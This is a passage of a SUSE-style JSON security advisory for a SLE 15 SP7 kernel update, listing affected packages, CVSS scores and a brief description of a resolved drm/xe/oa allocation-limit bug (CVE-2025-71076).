"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "important"
}
],
"title": "CVE-2025-71066"
},
{
"cve": "CVE-2025-71076",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71076"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/xe/oa: Limit num_syncs to prevent oversized allocations\n\nThe OA open parameters did not validate num_syncs, allowing\nuserspace to pass arbitrarily large values, potentially\nleading to excessive allocations.\n\nAdd check to ensure that num_syncs does not exceed DRM_XE_MAX_SYNCS,\nreturning -EINVAL when the limit is violated.\n\nv2: use XE_IOCTL_DBG() and drop duplicated check. (Ashutosh)\n\n(cherry picked from commit e057b2d2b8d815df3858a87dffafa2af37e5945b)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71076",
"url": "https://www.suse.com/security/cve/CVE-2025-71076"
},
{
"category": "external",
"summary": "SUSE Bug 1256627 for CVE-2025-71076",
"url": "https://bugzilla.suse.com/1256627"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
